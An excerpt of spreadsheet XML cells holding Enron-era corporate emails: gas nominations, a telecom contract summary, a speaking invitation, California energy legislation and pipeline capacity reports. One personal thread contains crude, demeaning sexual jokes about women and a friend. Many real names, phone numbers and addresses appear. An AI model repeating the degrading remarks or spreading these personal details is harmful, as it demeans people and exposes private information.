X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700_x000D_
Importance: Normal_x000D_
_x000D_
This is to request that Spinnaker increase their nomination effective as_x000D_
soon as possible from the current 9,100 to 12,600.  A spreadsheet is_x000D_
attached showing the figures and method used to determine the requested_x000D_
rate.  I will continue to monitor the well(s) daily for rate changes and_x000D_
will advise of required changes in noms._x000D_
_x000D_
Please advise when you have increased your nom and the effective date -_x000D_
either by e-mail or telephone (direct line 337/272-7403).  Thank you for_x000D_
your cooperation in this effort to maintain a balance between noms and_x000D_
delivery._x000D_
_x000D_
_x000D_
_x000D_
 - WS to calc suggested noms for Dec VR 375.xls_x000D_
</t>
  </si>
  <si>
    <t>Tue, 17 Jul 2001 13:48:25 -0700 (PDT)</t>
  </si>
  <si>
    <t>Anadarko Spot Contract</t>
  </si>
  <si>
    <t xml:space="preserve">Per my voicemail, attached is the master spot contract.  Please let me know if you have any questions._x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Tue, 31 Jul 2001 12:23:02 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rich.dimichele@enron.com'})</t>
  </si>
  <si>
    <t>FW: MSN - Jesse Call Summary</t>
  </si>
  <si>
    <t>_x000D_
Latest MSN update.  This is all positive.  I believe we are addressing issues and executing.  Rich_x000D_
 -----Original Message-----_x000D_
From: 	Plante, Everett  _x000D_
Sent:	Tuesday, July 31, 2001 2:01 PM_x000D_
To:	Dimichele, Rich; Fallon, Jim; Seeligson, Stewart; Schrage, Adam; Racicot, Paul_x000D_
Cc:	Suarez, John; Sarkissian, Arshak; Enochs, Fred; Giles, Gene; Easterby, David; Plante, Everett_x000D_
Subject:	MSN - Jesse Call Summary_x000D_
_x000D_
Summary of call with Jesse Nunoz - MSN - Business Development - July 31, 2001_x000D_
_x000D_
LEC Turn up Delays - Jesse has agreed for Verizon MSAs to add an additional 30 days to the termination clause of 120 days.  This will allow us effectively 180 days to get Verizon MSAs up and into services. (150 + 30 days for cure)_x000D_
_x000D_
Acceptance Period - Jesse has agreed to shorten the acceptance period to 7 days beginning on Sept 24th, and to change the wording on the cure period Materially significant failures would need to be cured in 14 days,  all other failures the cure would be negotiated. Materially Significant would translate to those failures that would make the MSA unavailable.  The acceptance period remains just for the four cities. (LA, Atlanta, Houston, &amp; NY)_x000D_
_x000D_
Circuit Cancellation Charges - Fred Enochs determined that cancellation charges would only be incurred after circuit turn-up and acceptance by EBS,  however once the circuit is in place EBS would pay the 12 mos. Contract,  if we terminate.  Therefore, I approached Jesse with the idea that we would keep both circuits and MSN would pay us for the cost of the circuit until their forecast commercially required the use of that circuit. (OK that is the FOX watching the Hen house).  He tentatively agreed to this approach,  waiting on the details on the FOC dates and cost estimates. _x000D_
_x000D_
Quest - Jesse indicated that he has received a call from Quest where they were expressing concern over our capacity in place in their (Quests) five cities. Jesse and I agreed to schedule a call with Quest  to go over their concerns and determine what actions if any needs to be taken.  This may be our opportunity to begin the conversation on the "Build to Forecast" issue we have with the agreement.  I will be sure to include Fred in that call._x000D_
_x000D_
Jesse agreed to have legal language back to me this week addressing the aforementioned topics.  I will work with legal to insure we are ready to respond._x000D_
_x000D_
Regards,_x000D_
_x000D_
Everett</t>
  </si>
  <si>
    <t>Fri, 2 Feb 2001 08:50:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Your speaking engagement at Baylor on evening of February 23</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 02/02/2001 _x000D_
04:53 PM ---------------------------_x000D_
_x000D_
_x000D_
Jim Garven &lt;James_Garven@baylor.edu&gt; on 02/01/2001 05:50:13 PM_x000D_
To: vince j kaminski &lt;vince_j_kaminski@enron.com&gt;_x000D_
cc:  _x000D_
Subject: Your speaking engagement at Baylor on evening of February 23_x000D_
_x000D_
_x000D_
Dear Vince,_x000D_
_x000D_
I am following up concerning your upcoming speaking engagement at Baylor on_x000D_
evening of February 23.  Of course, I'll plan to see you during the_x000D_
afternoon at John Martin's "new economy" conference.  That evening, you_x000D_
will be the dinner speaker for the official chartering ceremony of the_x000D_
Gamma Iota Sigma Risk Management and Insurance fraternity.  We are hoping_x000D_
for a really good turnout that evening, and expect guests not only from_x000D_
around Texas but also possibly other parts of the country.  I am not sure_x000D_
what your travel plans are, but I did take the liberty of setting up a_x000D_
guaranteed reservation for you at the Marriott Courtyard (Confirmation_x000D_
#84857419).  Let me know if you don't need the reservation, but otherwise_x000D_
it will be available to you._x000D_
_x000D_
I also am interested in finding out whether I might be able to attract you_x000D_
to campus on another occasion to speak to my corporate risk management_x000D_
classes.  Perhaps we can discuss this possibility when we see each other_x000D_
about three weeks from now._x000D_
_x000D_
Sincerely, with best regards,_x000D_
_x000D_
Jim Garven_x000D_
_x000D_
__________________________________________x000D_
James R. Garven, Ph.D._x000D_
Professor of Finance &amp; Insurance_x000D_
Department of Finance, Insurance and Real Estate_x000D_
Hankamer School of Business_x000D_
HSB 336_x000D_
Baylor University_x000D_
Box 98004_x000D_
Waco, TX  76798_x000D_
_x000D_
Voice: (254) 710-6207_x000D_
Fax: (603) 994-6680_x000D_
_x000D_
E-mail: James_Garven@baylor.edu_x000D_
Home Page: http://garven.baylor.edu_x000D_
Vita: http://garven.baylor.edu/dossier.html_x000D_
Research Paper Archive: http://garven.baylor.edu/research.html_x000D_
__________________________________________x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 16 May 2001 07:17:43 -0700 (PDT)</t>
  </si>
  <si>
    <t>i think miami would be more fun than cayman.  cayman is really laid back.  miami = hot sluts_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Ryan Lee" &lt;ralee@rmi.net&gt;@ENRON [mailto:IMCEANOTES-+22Ryan+20Lee+22+20+3Cralee+40rmi+2Enet+3E+40ENRON@ENRON.com] _x000D_
Sent:	Wednesday, May 16, 2001 10:26 AM_x000D_
To:	Lenhart, Matthew_x000D_
Subject:	Re: Jen and Max!!!!_x000D_
_x000D_
_x000D_
Really?  I could definetely handle the South  Beach._x000D_
----- Original Message ----- _x000D_
From:  Matthew.Lenhart@enron.com &lt;&lt; File: mailto:Matthew.Lenhart@enron.com &gt;&gt;  _x000D_
To: ralee@rmi.net &lt;&lt; File: mailto:ralee@rmi.net &gt;&gt;  ; pederleifkjeseth@hotmail.com &lt;&lt; File: mailto:pederleifkjeseth@hotmail.com &gt;&gt;  ; merlinm@uswest.net &lt;&lt; File: mailto:merlinm@uswest.net &gt;&gt;  _x000D_
Cc: scott.morrill@grubb-ellis.com &lt;&lt; File: mailto:scott.morrill@grubb-ellis.com &gt;&gt;  _x000D_
Sent: Wednesday, May 16, 2001 6:11  AM_x000D_
Subject: RE: Jen and Max!!!!_x000D_
i heard they might move the wedding to  miami_x000D_
    -----Original Message-----_x000D_
    From:   "Ryan Lee" &lt;ralee@rmi.net &lt;&lt; File: mailto:ralee@rmi.net &gt;&gt; &gt;@ENRON_x000D_
              mailto:IMCEANOTES-+22Ryan+20Lee+22+20+3Cralee+40rmi+2Enet+3E+40ENRON@ENRON.com &lt;&lt; File: mailto:IMCEANOTES-+22Ryan+20Lee+22+20+3Cralee+40rmi+2Enet+3E+40ENRON@ENRON.com &gt;&gt; ]_x000D_
    Sent:   Tuesday, May 15, 2001 6:53 PM_x000D_
    To:     Lenhart, Matthew; Peder Kjeseth ;  merlinm_x000D_
   Cc:      scott.morrill_x000D_
   Subject:  Re: Jen and  Max!!!!_x000D_
   Did they just assume we can all afford this!  I'm poor and  stupid, I_x000D_
   don't know how I will do  it!   Ryan_x000D_
   ----- Original Message  -----_x000D_
   From:  Lenhart, Matthew &lt;&lt; File: mailto:Matthew.Lenhart@ENRON.com &lt;&lt; File: mailto:Matthew.Lenhart@ENRON.com &gt;&gt;   &gt;&gt;_x000D_
   To: Peder Kjeseth  &lt;&lt; File: mailto:pederleifkjeseth@hotmail.com &lt;&lt; File: mailto:pederleifkjeseth@hotmail.com &gt;&gt;   &gt;&gt; ;_x000D_
   ralee &lt;&lt; File: mailto:ralee@rmi.net &lt;&lt; File: mailto:ralee@rmi.net &gt;&gt;  &gt;&gt;  ; merlinm  &lt;&lt; File:_x000D_
   mailto:merlinm@uswest.net &lt;&lt; File: mailto:merlinm@uswest.net &gt;&gt;  &gt;&gt;   ; Lenhart, Matthew &lt;&lt; File:_x000D_
   mailto:Matthew.Lenhart@ENRON.com &lt;&lt; File: mailto:Matthew.Lenhart@ENRON.com &gt;&gt;   &gt;&gt;_x000D_
   Cc: scott.morrill &lt;&lt; File: mailto:scott.morrill@grubb-ellis.com &lt;&lt; File: mailto:scott.morrill@grubb-ellis.com &gt;&gt;   &gt;&gt;_x000D_
   Sent: Tuesday, May 15, 2001 3:35 PM_x000D_
    Subject: RE: Jen and Max!!!!_x000D_
   i just looked at the prices for  flights to cayman and they run  around_x000D_
   $600.  this  is going to cost over $1000.  start saving  now._x000D_
    &gt;  -----Original Message-----_x000D_
   &gt; From: Peder   Kjeseth  [mailto:pederleifkjeseth@hotmail.com &lt;&lt; File: mailto:pederleifkjeseth@hotmail.com &gt;&gt;   &lt;&lt; File:_x000D_
   mailto:pederleifkjeseth@hotmail.com &lt;&lt; File: mailto:pederleifkjeseth@hotmail.com &gt;&gt;   &gt;&gt; ]_x000D_
   &gt; Sent: Wednesday, May 09, 2001 6:14  PM_x000D_
   &gt; To: ralee; merlinm;   Matthew.Lenhart_x000D_
   &gt; Cc: scott.morrill_x000D_
   &gt;  Subject: Re: Jen and  Max!!!!_x000D_
   &gt;_x000D_
    &gt;_x000D_
   &gt; I think we should dig up that slip that Matt   Hersh gave to Max saying_x000D_
   &gt; that_x000D_
   &gt; he  might have been exposed to an  STD and then get the photo of  his_x000D_
   &gt; cock in a_x000D_
   &gt; doughnut to   complete the circle.  Has anyone fwded that mail to Coco?_x000D_
    &gt;  I'm_x000D_
   &gt; sure she has a couple fond memories for  the two of them to  savor_x000D_
   &gt; throughout_x000D_
    &gt; their marrige._x000D_
   &gt;_x000D_
   &gt;  -PLK_x000D_
   &gt;_x000D_
   &gt;_x000D_
   &gt; &gt;From:  "Ryan Lee" &lt;ralee@rmi.net &lt;&lt; File: mailto:ralee@rmi.net &gt;&gt;  &lt;&lt; File:  mailto:ralee@rmi.net &lt;&lt; File: mailto:ralee@rmi.net &gt;&gt;  &gt;&gt;  &gt;_x000D_
   &gt; &gt;To: &lt;merlinm@uswest.net &lt;&lt; File: mailto:merlinm@uswest.net &gt;&gt;  &lt;&lt; File: mailto:merlinm@uswest.net &lt;&lt; File: mailto:merlinm@uswest.net &gt;&gt;  &gt;&gt; &gt;,  &lt;_x000D_
   Matthew.Lenhart@enron.com &lt;&lt; File: mailto:Matthew.Lenhart@enron.com &gt;&gt;  &lt;&lt;  File: mailto:Matthew.Lenhart@enron.com &lt;&lt; File: mailto:Matthew.Lenhart@enron.com &gt;&gt;   &gt;&gt; &gt;_x000D_
   &gt;  &gt;CC: &lt;Matthew.Lenhart@enron.com &lt;&lt; File: mailto:Matthew.Lenhart@enron.com &gt;&gt;  &lt;&lt;  File:_x000D_
   mailto:Matthew.Lenhart@enron.com &lt;&lt; File: mailto:Matthew.Lenhart@enron.com &gt;&gt;   &gt;&gt; &gt;,  &lt;pederleifkjeseth@hotmail.com &lt;&lt; File: mailto:pederleifkjeseth@hotmail.com &gt;&gt; _x000D_
    &lt;&lt; File: mailto:pederleifkjeseth@hotmail.com &lt;&lt; File: mailto:pederleifkjeseth@hotmail.com &gt;&gt;   &gt;&gt; &gt;,_x000D_
   &gt;  &gt;&lt;scott.morrill@grubb-ellis.com &lt;&lt; File: mailto:scott.morrill@grubb-ellis.com &gt;&gt;   &lt;&lt; File:_x000D_
   mailto:scott.morrill@grubb-ellis.com &lt;&lt; File: mailto:scott.morrill@grubb-ellis.com &gt;&gt;   &gt;&gt; &gt;_x000D_
   &gt;  &gt;Subject: Re: Jen and  Max!!!!_x000D_
   &gt; &gt;Date: Wed, 9 May 2001 12:55:06   -0600_x000D_
   &gt; &gt;_x000D_
   &gt; &gt;What is this book  thing. I will crack skulls!  I'll wipe a booger on_x000D_
   &gt;  the_x000D_
   &gt; &gt;first page. Then I'll sign it   "REMO"!_x000D_
   &gt; &gt;_x000D_
   &gt; &gt;----- Original  Message -----_x000D_
   &gt;  &gt;From: &lt;Matthew.Lenhart@enron.com &lt;&lt; File: mailto:Matthew.Lenhart@enron.com &gt;&gt;  &lt;&lt;  File:_x000D_
   mailto:Matthew.Lenhart@enron.com &lt;&lt; File: mailto:Matthew.Lenhart@enron.com &gt;&gt;   &gt;&gt; &gt;_x000D_
   &gt;  &gt;To: &lt;merlinm@uswest.net &lt;&lt; File: mailto:merlinm@uswest.net &gt;&gt;  &lt;&lt; File: mailto:merlinm@uswest.net &lt;&lt; File: mailto:merlinm@uswest.net &gt;&gt;  &gt;&gt;  &gt;_x000D_
   &gt; &gt;Cc:  &lt;Matthew.Lenhart@enron.com &lt;&lt; File: mailto:Matthew.Lenhart@enron.com &gt;&gt;  &lt;&lt;  File:_x000D_
   mailto:Matthew.Lenhart@enron.com &lt;&lt; File: mailto:Matthew.Lenhart@enron.com &gt;&gt;   &gt;&gt; &gt;;  &lt;pederleifkjeseth@hotmail.com &lt;&lt; File: mailto:pederleifkjeseth@hotmail.com &gt;&gt; _x000D_
    &lt;&lt; File: mailto:pederleifkjeseth@hotmail.com &lt;&lt; File: mailto:pederleifkjeseth@hotmail.com &gt;&gt;   &gt;&gt; &gt;;_x000D_
   &gt;  &gt;&lt;ralee@rmi.net &lt;&lt; File: mailto:ralee@rmi.net &gt;&gt;  &lt;&lt; File: mailto:ralee@rmi.net &lt;&lt; File: mailto:ralee@rmi.net &gt;&gt;  &gt;&gt; &gt;;  &lt;_x000D_
   scott.morrill@grubb-ellis.com &lt;&lt; File: mailto:scott.morrill@grubb-ellis.com &gt;&gt;   &lt;&lt; File:_x000D_
   mailto:scott.morrill@grubb-ellis.com &lt;&lt; File: mailto:scott.morrill@grubb-ellis.com &gt;&gt;   &gt;&gt; &gt;_x000D_
   &gt;  &gt;Sent: Wednesday, May 09, 2001  11:27 AM_x000D_
   &gt; &gt;Subject: Re: Jen and   Max!!!!_x000D_
   &gt; &gt;_x000D_
   &gt; &gt;_x000D_
    &gt; &gt; &gt;_x000D_
   &gt; &gt; &gt; i think  she is one of  jen's cougar friends.  that is such a chick_x000D_
   &gt;   thing_x000D_
   &gt; &gt;to_x000D_
   &gt; &gt; &gt;  do._x000D_
   &gt; &gt; &gt;_x000D_
   &gt;   &gt;_x000D_
   &gt;_x000D_
   &gt;   __________________________________________________________________x000D_
    &gt; Get  your FREE download of MSN Explorer at http://explorer.msn.com &lt;&lt; File: http://explorer.msn.com &gt;&gt;   &lt;&lt;_x000D_
   File: http://explorer.msn.com &lt;&lt; File: http://explorer.msn.com &gt;&gt;   &gt;&gt;_x000D_
   &gt;</t>
  </si>
  <si>
    <t>Wed, 4 Apr 2001 03:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'nancy.vu@enron.com'})</t>
  </si>
  <si>
    <t>Re: Mexico March Originations</t>
  </si>
  <si>
    <t xml:space="preserve">Nancy,_x000D_
_x000D_
1) The two incorrect "corrections" for $379.50/ea will be taken out in _x000D_
tonight's orig schedule._x000D_
2) The $338,955 for the Vitro Corprativo deal will be granted tonight._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Errol Mclaughlin_x000D_
_x000D_
_x000D_
From: Nancy H Vu/ENRON@enronXgate on 04/03/2001 06:24 PM_x000D_
To: Errol McLaughlin/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Mexico March Originations_x000D_
_x000D_
Errol,_x000D_
_x000D_
Please review the following file (the tab marked "2001 Summary") and help me _x000D_
answer the following questions for March:_x000D_
_x000D_
1.  Two additional originations "corrections" of $379.50 each were granted to _x000D_
Mexico, but I don't think they belong to us._x000D_
_x000D_
2.  The $338,955 Vitro Corporativo Deal #QW8224 was not granted to Mexico, _x000D_
but my originator, Agustin Perez, says it should have been.  Please let me _x000D_
know if you are responsible for this deal._x000D_
_x000D_
I will be in Monterrey from Wednesday through Friday but will be checking my _x000D_
voicemails &amp; e-mails periodically, so please feel free to contact me._x000D_
_x000D_
Thanks,_x000D_
_x000D_
NHV_x000D_
x5-3920_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 26 Jul 2001 09:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>California Update 7/26/01 p.3</t>
  </si>
  <si>
    <t>Below are the current provisions Keeley and Hertzberg are wanting to pass _x000D_
into legislation (when they return from recess).  Currently, they are not _x000D_
sure if all of these amendments would be wrapped up into one bill or if they _x000D_
would just amend bill SB78XX while introducing a new bill SB_XX.  Working _x000D_
under the assumption that they would amend bill 78XX and introduce a new one, _x000D_
the following issues are a reflection of their current positions.  If they _x000D_
decide to introduce one new bill than the issues below would be included into _x000D_
one piece of legislation.  Please remember, these issues are only their _x000D_
current thoughts and are such to change._x000D_
_x000D_
SoCal Debt_x000D_
SB _XX_x000D_
? No provision for debt._x000D_
SB 78XX (amended)_x000D_
? Approximately $2.9B through corporate bond financing supported by a _x000D_
Dedicated Rate Component (DRC) over a period of time sufficient to pay the _x000D_
bonds (10-15 years).  Final debt amount to be established by the PUC and the _x000D_
State Auditor._x000D_
_x000D_
Core vs. Non-Core_x000D_
SB _XX_x000D_
? For purposes of paying the SoCal debt, creates a Core program for consumers _x000D_
with a peak demand of less than ?Kw and Non-Core customers of ?Kw or more.  _x000D_
They would share in the cost of SoCal debt retirement: (1) all consumers _x000D_
share pro rata for the first two years, (2) Non-Core pay 100% after two years._x000D_
SB 78XX(amended)_x000D_
? No Provisions._x000D_
_x000D_
Transmission System Purchase_x000D_
SB _XX and SB 78XX_x000D_
? No purchase of transmission assets._x000D_
_x000D_
Conservation Easements_x000D_
SB _XX_x000D_
? No conservation easements._x000D_
SB 78XX(amended)_x000D_
? Specific conservation easements and other land arrangements described in _x000D_
bill for about 24,000 acres per the Governor's MOU._x000D_
_x000D_
Direct Access_x000D_
SB _XX_x000D_
? Removes regulatory constraints on a Direct Access program effective January _x000D_
1, 2002 and permits customers to buy power if there is a net short after _x000D_
SoCal native generation, bilateral contracts, and DWR contracts.  Residential _x000D_
and small commercial customers may use direct access from renewable energy _x000D_
sources._x000D_
SB 78XX(amended)_x000D_
? No provisions for Direct Access._x000D_
_x000D_
Ratepayer Benefit Account_x000D_
SB _XX_x000D_
? Deposits in the account any refunds or net cash resulting from (a) any _x000D_
refunds ordered by FERC or from litigation, and (b) any positive DWR Power _x000D_
Fund revenues; all to be refunded to ratepayers through either bill credits _x000D_
or rate reductions in proportion to the March, 2001 PUC rate increase._x000D_
SB 78XX(amended)_x000D_
? Does not create a Ratepayer Benefit Account._x000D_
_x000D_
Electric Supplier Claims Settlement Trust_x000D_
SB _XX and SB 78XX_x000D_
? Does not create a Trust or trustee to negotiate reductions._x000D_
_x000D_
Renewable Energy_x000D_
SB _XX_x000D_
? Creates a Renewable Portfolio Standard (RPS) to achieve a target of 10% of _x000D_
all new generating capacity additions through 2010 and overall 20% of _x000D_
statewide total generating capacity by 2010.  Munis have been exempted from _x000D_
the RPS._x000D_
SB 78XX(amended)_x000D_
? No provisions for renewable energy.</t>
  </si>
  <si>
    <t>Fri, 11 May 2001 02:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: bs</t>
  </si>
  <si>
    <t>i have to go to a dinner tonight, but i will meet up with you guys at the _x000D_
grasshopper if you want.  we need to check that joint out.  call me on my _x000D_
cell and we will hit it.</t>
  </si>
  <si>
    <t>Fri, 1 Sep 2000 09:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Paycheck</t>
  </si>
  <si>
    <t xml:space="preserve">Suzanne:_x000D_
Please mail me my paycheck when you get a chance.    I'm glad that you had a _x000D_
great vacation.  We are doing well.  I've joined some tennis leagues at the _x000D_
club that we belong to and they are alot of fun.  Feel free to stop by some _x000D_
time this weekend if you are in the neighborhood.  We will be around most of _x000D_
the weekend.  Charles is doing great and so are the rest of the family.  _x000D_
thank God Bill is home with me.  He is a big help as is Arthur.  Hope to see _x000D_
you soon._x000D_
Carol St. Clair_x000D_
EB 3892_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)_x000D_
carol.st.clair@enron.com_x000D_
_x000D_
_x000D_
_x000D_
	Suzanne Adams_x000D_
	08/31/00 02:20 PM_x000D_
		 _x000D_
		 To: Carol St Clair/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Paycheck_x000D_
_x000D_
Hi Carol, I have your paycheck here, but nothing else.  Do you want me to _x000D_
just send it alone or wait. I know you have it automatically deposited.  Did _x000D_
you get the picture ok?  How did you like it?  Ric bought me one while we _x000D_
were in CA (not like yours, but a limited edition).  Those puppies cost _x000D_
$250!  That was a nice deal toy._x000D_
_x000D_
How's everything going?  We had a great time in CA, ate and drank our way _x000D_
through the wine country.  That's about all my news._x000D_
_x000D_
You did get my thank you note for my birthday present didn't you?  Thanks _x000D_
again!_x000D_
</t>
  </si>
  <si>
    <t>Fri, 26 Oct 2001 07:22:26 -0700 (PDT)</t>
  </si>
  <si>
    <t>California Capacity Report for Week of 10/22-10/26</t>
  </si>
  <si>
    <t xml:space="preserve">Transwestern's average deliveries to California were 945 MMBtu/d (87%), with San Juan lateral throughput at 865 MMBtu/d.  Total East deliveries averaged 525 MMBtu/d.  _x000D_
_x000D_
El Paso's average deliveries to California were 1782 MMBtu/d (66%):_x000D_
- PG&amp;ETop, capacity of 1140 MMBtu/d, deliveries of 667 MMBtu/d (59%)_x000D_
- SoCalEhr, capacity 1042 MMBtu/d, deliveries of 707 MMBtu/d (68%)_x000D_
- SoCalTop, capacity 512 MMBtu/d, deliveries of 408 MMBtu/d (80%)_x000D_
_x000D_
Friday's posted Gas Daily prices:_x000D_
	SoCal gas, large pkgs	  3.03 (+.69)_x000D_
	PG&amp;E, large pkgs	  3.02 (+.67)_x000D_
	TW San Juan		  n/a    _x000D_
	TW Permian		  2.86 (+.695)_x000D_
_x000D_
Enron Online bases:_x000D_
		Nov-Mar		Apr-Oct_x000D_
Perm-CA	.17 (+.02)	    	.26 (+.03)_x000D_
SJ - CA	.27 (+.03)  	       	.44 (+.03)_x000D_
SJ-Waha	.14 (+.02)	       	.22 (even)	_x000D_
Perm-Waha	.04 (+.01)                 	.04 (even)	</t>
  </si>
  <si>
    <t>Mon, 15 May 2000 07:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Notice</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Chris Germany/HOU/ECT on 05/15/2000 02:07 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Twyla_S._Strogen@DOM.COM on 05/15/2000 01:13:44 PM_x000D_
To: Customer_Advisory_Board@DOM.COM_x000D_
cc:  _x000D_
Subject: Notice_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
ATTENTION WEB E-SCRIPT USERS:_x000D_
_x000D_
On Thursday, May 18, 2000, Web E-SCRIPT Users will be required to download an_x000D_
updated_x000D_
version of the plug-in to access the system.  You will be prompted to download_x000D_
upon_x000D_
launching the web page.  With slower connections, the download could take 20+_x000D_
minutes._x000D_
Please contact the E-SCRIPT Help Line if you would like to receive a CD with _x000D_
the_x000D_
 plug-in._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 10 Apr 2001 10:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>EGM presentaion and update</t>
  </si>
  <si>
    <t xml:space="preserve">Steve,_x000D_
_x000D_
Attached, for your information and reference, is copy of a presentation tha=_x000D_
t=20_x000D_
was created as an internal briefing document on the business activities=20_x000D_
within EGM.  The purpose of this presentation is to communicate our=20_x000D_
activities and provide individuals with a more detailed reference document =_x000D_
on=20_x000D_
these businesses in case they come up in Q&amp;A._x000D_
_x000D_
This is a confidential and internal document, which includes earnings=20_x000D_
targets, goals and objectives.  We have a shorter more external version tha=_x000D_
t=20_x000D_
we use to describe our businesses.  I can provide that copy if you are=20_x000D_
interested._x000D_
_x000D_
Please don=01,t hesitate to contact me if you have any questions or would l=_x000D_
ike=20_x000D_
to discuss this in more detail. =20_x000D_
_x000D_
Thanks,_x000D_
mike_x000D_
_x000D_
PS I sent this to IR and Palmer but yours came back due to a bad email=20_x000D_
address at EES._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 22 Jun 2000 10:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>This is a reminder !!!!!  There will be a Friday Meeting June 23, 2000._x000D_
_x000D_
     _x000D_
    Date:  Friday June 23, 2000_x000D_
_x000D_
    Time:  2:30 pm - 4:30 pm_x000D_
_x000D_
    Location: 30C1  _x000D_
 _x000D_
    Topic:   Combined Staff and Budget Meeting_x000D_
_x000D_
      _x000D_
_x000D_
_x000D_
If you have any questions or conflicts, please feel free to call me (3-0643) _x000D_
or Bev (3-7857)._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay 3-0643</t>
  </si>
  <si>
    <t>Tue, 16 Jan 2001 02:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 01/16/2001 _x000D_
10:07 AM ---------------------------_x000D_
_x000D_
_x000D_
"Btu" &lt;subs@btu.net&gt; on 01/12/2001 04:12:44 PM_x000D_
To: "Btu Weekly" &lt;&gt;_x000D_
cc:  _x000D_
Subject: Btu Weekly_x000D_
_x000D_
_x000D_
_x000D_
Attached is the latest issue of Btu Weekly._x000D_
_x000D_
e-mail: info@Btu.net_x000D_
phone: 732-758-8222_x000D_
fax: 732-758-8286_x000D_
_x000D_
_x000D_
 - wg011501.pdf_x000D_
</t>
  </si>
  <si>
    <t>Mon, 29 Nov 1999 05:20:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: New Short Descriptions</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for taking care of this.  Sorry I was not reachable._x000D_
_x000D_
_x000D_
To: David Forster/LON/ECT@ECT_x000D_
cc: Stacy E Dickson/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT _x000D_
Subject: Re: New Short Descriptions  _x000D_
_x000D_
David, As long as the long descriptions have not changed and the traders are _x000D_
fine with the short description changes as being clearer, I have no problems _x000D_
with the changes on the financial side.  Stacy will respond on the physical _x000D_
gas side._x000D_
_x000D_
_x000D_
_x000D_
David Forster_x000D_
11/24/99 11:44 AM_x000D_
To: Stacy E Dickson/HOU/ECT@ECT, Jeffrey T Hodge/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: New Short Descriptions_x000D_
_x000D_
Please find attached a spreadsheet showing the new descriptions and some _x000D_
samples of the old descriptions (I have to match these by hand, so it is not _x000D_
a comprehensive list)._x000D_
_x000D_
The changes are:_x000D_
_x000D_
1) Re-ordering of the elements_x000D_
2) Shortening the index/location description to something which is more _x000D_
recognizeable to the traders (and our customers)_x000D_
_x000D_
We would like to be showing these short descriptions to customers on Monday, _x000D_
so your response/input is needed today._x000D_
_x000D_
Sorry about the short notice - we're all in the same boat on this one._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Dave_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 29 Sep 2000 09:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>review of valuation model for storage</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 09/29/2000 _x000D_
05:04 PM ---------------------------_x000D_
_x000D_
_x000D_
Darrell Duffie &lt;duffie@Stanford.EDU&gt; on 09/19/2000 08:04:35 PM_x000D_
Please respond to Darrell Duffie &lt;duffie@Stanford.EDU&gt;_x000D_
To: hoshino@Stanford.EDU_x000D_
cc: vince@egs.com, Vince.J.Kaminski@enron.com _x000D_
Subject: review of valuation model for storage_x000D_
_x000D_
_x000D_
Taiichi:_x000D_
_x000D_
Here is the cover letter and report_x000D_
that I sent to Vince Kaminsky on June 26._x000D_
As Zimin was the source of the_x000D_
model and code, I think Vince_x000D_
may not mind if you forward_x000D_
it directly to Zimin._x000D_
Please wait 24 hours before_x000D_
doing so in order to give_x000D_
Vince a chance to countermand that._x000D_
_x000D_
Thanks!_x000D_
_x000D_
Darrell_x000D_
_x000D_
_x000D_
_x000D_
------------- Begin Forwarded Message -------------_x000D_
_x000D_
Date: Mon, 26 Jun 2000 10:04:37 -0700 (PDT)_x000D_
From: Darrell Duffie &lt;duffie@Stanford.EDU&gt;_x000D_
Subject: review of valuation model for storage_x000D_
To: vince@egs.com_x000D_
Cc: duffie@Stanford.EDU_x000D_
MIME-Version: 1.0_x000D_
X-UIDL: 6e99939f2365395c2accfdf2edb72b88_x000D_
_x000D_
Vince:_x000D_
_x000D_
_x000D_
I attach a report, prepared under my direction_x000D_
by my research assistant, Dr. Taiichi Hoshino,_x000D_
now employed with Goldman Sachs, on the Enron storage_x000D_
valuation model that you asked me to review._x000D_
_x000D_
This report contains some details that_x000D_
you didn't ask for, but that your research staff_x000D_
might appreciate._x000D_
_x000D_
The model and software are appropriate to_x000D_
the task they are designed for, in my opinion, based_x000D_
on the code and the documentation that_x000D_
you sent. Some suggestions for_x000D_
potential improvement are noted_x000D_
in the attached report, but these_x000D_
are either minor or not critical_x000D_
to the current business objectives of the model,_x000D_
in my view._x000D_
_x000D_
If this email is not sufficient, or you_x000D_
would prefer a hard-copy opinion letter,_x000D_
please let me know._x000D_
_x000D_
_x000D_
Meanwhile, I hope life at Enron is_x000D_
as exciting as usual!_x000D_
_x000D_
Sincere regards,_x000D_
_x000D_
